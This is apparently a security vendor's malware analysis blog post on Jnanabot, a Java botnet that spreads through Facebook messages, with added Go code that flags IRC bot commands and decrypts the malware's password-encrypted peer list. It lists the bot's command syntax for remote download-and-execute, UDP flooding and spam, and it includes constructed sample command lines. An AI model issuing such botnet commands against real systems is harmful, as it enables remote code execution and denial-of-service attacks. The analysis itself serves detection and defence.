Jnanabot is extensive in its scope of infection and has a wide variety of functions. Its main propagation vector is the social networking website Facebook. Beyond that, Jnanabot also has an array of components meshed together to perform different tasks: a key-logging component to steal information; an IRC component to control the compromised computer from a remote machine; the ability to update itself; and, most of all, the ability to infect users across multiple platforms, namely Mac OS X, Windows, and Linux.
My previous blog describes in brief the different components of Jnanabot. Further analysis revealed various details about the components.
The Facebook propagation component is the prime component of Jnanabot. It is responsible for sending a message containing a malicious link to all friends on the user’s profile, which is the main propagation vector of the threat. The sample that we analyzed posts the following message:
It uses AJAX calls to perform its operations on Facebook. To start with, it searches for cookies of a logged-in Facebook user to authenticate itself. It then uses the following AJAX query to search for friends on the user’s profile:
The threat then iterates through the user’s friends list and sends each friend the above message using four different AJAX queries.
Users who have clicked on such a message, or whose friends report receiving such messages in their Facebook mailbox, should consider their computer infected. See here for removal instructions.
This is the backdoor component of Jnanabot; it waits for commands from the master to perform specific actions on the compromised computer. The malware writer used the source code of the Hacksoft botnet, which is freely available in underground communities, to develop this module. The botnet is written in Java, a crafty choice by the author given that his/her own code is also written in Java: it allows seamless integration with the existing code while keeping the threat platform independent. Some of the commands this bot accepts are as follows:
- .download [URL] [LOCAL FILE NAME] <execute>
- .sflood [HOST] [PORT] [THREADS] [DELAY] [CONNECTIONS]
- .screenshot [SECONDS] [LOCAL FILE]
- .spam [SERVER] [PORT] [CHANNEL] [CHANNEL PASSWORD (optional)]
- .mkdir [DIR]
As you can see from the commands, the threat is capable of performing a DDoS attack using udpflood, downloading and executing files from a remote location, capturing screenshots, and sending spam messages to a server.
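As an added illustration of how a defender might spot this command traffic (example code written for this post, not code from the original article or from the Hacksoft source), the following Go scanner parses IRC PRIVMSG lines from a capture and flags any message whose text begins with one of the bot commands listed above, checking the argument count against the listed syntax. The sample lines, nicks, hosts and addresses are constructed.

```go
package main

import (
	"fmt"
	"strings"
)

// Bot commands listed in the post, mapped to the minimum number of
// arguments each takes according to its listed syntax (optional
// arguments such as <execute> and the channel password are excluded).
var botCommands = map[string]int{
	".download":   2,
	".sflood":     5,
	".screenshot": 2,
	".spam":       3,
	".mkdir":      1,
}

// Finding records one IRC message that looked like a bot command.
type Finding struct {
	Line     int      // 1-based index into the scanned input
	Sender   string   // nick of the message sender (the would-be master)
	Target   string   // channel or nick the command was sent to
	Command  string   // matched command name, lower-cased
	Args     []string // arguments as sent
	Complete bool     // whether the argument count meets the listed syntax
}

// parsePrivmsg splits a raw IRC line of the form
// ":nick!user@host PRIVMSG <target> :<text>" into its parts.
// ok is false for lines that are not PRIVMSGs.
func parsePrivmsg(raw string) (sender, target, text string, ok bool) {
	line := strings.TrimRight(raw, "\r\n")
	if strings.HasPrefix(line, ":") {
		sp := strings.IndexByte(line, ' ')
		if sp < 0 {
			return "", "", "", false
		}
		sender = line[1:sp]
		if bang := strings.IndexByte(sender, '!'); bang >= 0 {
			sender = sender[:bang]
		}
		line = line[sp+1:]
	}
	// The first " :" separates the command/target from the message text.
	parts := strings.SplitN(line, " :", 2)
	fields := strings.Fields(parts[0])
	if len(parts) != 2 || len(fields) != 2 || fields[0] != "PRIVMSG" {
		return "", "", "", false
	}
	return sender, fields[1], parts[1], true
}

// ScanIRC returns a Finding for every PRIVMSG whose text starts with
// one of the known bot commands.
func ScanIRC(lines []string) []Finding {
	var out []Finding
	for i, raw := range lines {
		sender, target, text, ok := parsePrivmsg(raw)
		if !ok {
			continue
		}
		words := strings.Fields(text)
		if len(words) == 0 {
			continue
		}
		cmd := strings.ToLower(words[0])
		minArgs, known := botCommands[cmd]
		if !known {
			continue
		}
		out = append(out, Finding{
			Line: i + 1, Sender: sender, Target: target,
			Command: cmd, Args: words[1:],
			Complete: len(words)-1 >= minArgs,
		})
	}
	return out
}

func main() {
	// Constructed sample capture; nicks, hosts and addresses are made up.
	sample := []string{
		":master!m@198.51.100.7 PRIVMSG #ctl :.sflood 192.0.2.10 80 50 0 1000",
		":alice!a@host PRIVMSG #ctl :hello everyone",
		":master!m@198.51.100.7 PRIVMSG bot123 :.download http://example.invalid/u.bin upd.jar execute",
		"PING :irc.example.invalid",
		":master!m@198.51.100.7 PRIVMSG #ctl :.screenshot 5",
	}
	for _, f := range ScanIRC(sample) {
		fmt.Printf("line %d: %s -> %s %s %v (args complete: %v)\n",
			f.Line, f.Sender, f.Target, f.Command, f.Args, f.Complete)
	}
}
```

In practice the command prefix would be one signal among several (a rarely used server, a channel name that never changes, periodic reconnects); a bare string match on `.sflood` is easy to evade by renaming commands, so treat it as a starting point for a rule rather than the rule itself.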
As explained in my previous blog, this is the component that controls all the other components. It holds a list of URLs from which it downloads the file applet_hosts.txt. The hosts in this file are then used to download additional components of the threat.
The threat also has other ways to update and propagate itself. It downloads a file named “pex.bsl”, which, from our analysis of the threat, contains the host names of peers used to update its files. The file pex.bsl is encrypted with PBEWithMD5AndDES, a password-based encryption algorithm, and the password needed for decryption is also hardcoded. The threat also generates a random port number between 1024 and 65535 to connect to those hosts; the default port number is 20632.
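To show why a hardcoded password makes this protection weak, here is an added example (written for this post; not code from the original article or from the threat) in Go that reproduces the scheme behind Java's PBEWithMD5AndDES, namely PKCS#5 v1.5 PBKDF1 key derivation with MD5 feeding DES in CBC mode with PKCS#5 padding, and uses it to recover a peer list from such a file. Anyone holding the password, salt and iteration count extracted from the sample can do the same. The password, salt, iteration count and peer host names below are constructed placeholders; the real values are not on the page.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"crypto/md5"
	"errors"
	"fmt"
	"strings"
)

// pbkdf1MD5 implements the PKCS#5 v1.5 PBKDF1 derivation that Java's
// "PBEWithMD5AndDES" uses: T1 = MD5(password || salt), Ti = MD5(Ti-1),
// iterated `count` times. Bytes 0..7 of the result are the DES key and
// bytes 8..15 are the CBC IV.
func pbkdf1MD5(password, salt []byte, count int) (key, iv []byte) {
	t := md5.Sum(append(append([]byte{}, password...), salt...))
	for i := 1; i < count; i++ {
		t = md5.Sum(t[:])
	}
	return t[:8], t[8:16]
}

// pbeEncrypt exists only so the example can produce a ciphertext to
// decrypt; it mirrors PBEWithMD5AndDES (DES-CBC with PKCS#5 padding).
func pbeEncrypt(password, salt []byte, count int, pt []byte) ([]byte, error) {
	key, iv := pbkdf1MD5(password, salt, count)
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pad := des.BlockSize - len(pt)%des.BlockSize // always 1..8
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return ct, nil
}

// pbeDecrypt recovers the plaintext from a PBEWithMD5AndDES ciphertext
// given the (hardcoded) password, salt and iteration count, then strips
// and validates the PKCS#5 padding.
func pbeDecrypt(password, salt []byte, count int, ct []byte) ([]byte, error) {
	if len(ct) == 0 || len(ct)%des.BlockSize != 0 {
		return nil, errors.New("ciphertext length is not a multiple of the DES block size")
	}
	key, iv := pbkdf1MD5(password, salt, count)
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1])
	if n < 1 || n > des.BlockSize || n > len(pt) {
		return nil, errors.New("invalid PKCS#5 padding (wrong password or salt?)")
	}
	for _, b := range pt[len(pt)-n:] {
		if int(b) != n {
			return nil, errors.New("invalid PKCS#5 padding (wrong password or salt?)")
		}
	}
	return pt[:len(pt)-n], nil
}

// parsePeerList splits a decrypted host list into one entry per
// non-empty line, trimming surrounding whitespace.
func parsePeerList(pt []byte) []string {
	var peers []string
	for _, line := range strings.Split(string(pt), "\n") {
		if s := strings.TrimSpace(line); s != "" {
			peers = append(peers, s)
		}
	}
	return peers
}

func main() {
	// Constructed sample values: the real password, salt and iteration
	// count are not on the page and would be read out of the sample.
	password := []byte("hypothetical-hardcoded-password")
	salt := []byte{1, 2, 3, 4, 5, 6, 7, 8}
	count := 20
	peerList := []byte("peer1.example\npeer2.example\n\npeer3.example\n")

	ct, _ := pbeEncrypt(password, salt, count, peerList)
	pt, err := pbeDecrypt(password, salt, count, ct)
	if err != nil {
		fmt.Println("decrypt failed:", err)
		return
	}
	fmt.Println("recovered peers:", parsePeerList(pt))
}
```

The point for defenders is that PBEWithMD5AndDES offers no confidentiality once the password ships inside the program: the derivation is deterministic, DES has a 56-bit key, and the padding check even tells an analyst when a guessed password is wrong. The same property lets a responder extract the peer list for blocking.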
We are currently investigating this module and will post a follow up blog when the information is available.
Facebook users are advised to be judicious while browsing and to avoid clicking suspicious links, even when the links are posted or messaged by friends.
Special thanks to Mario Ballano for his technical assistance.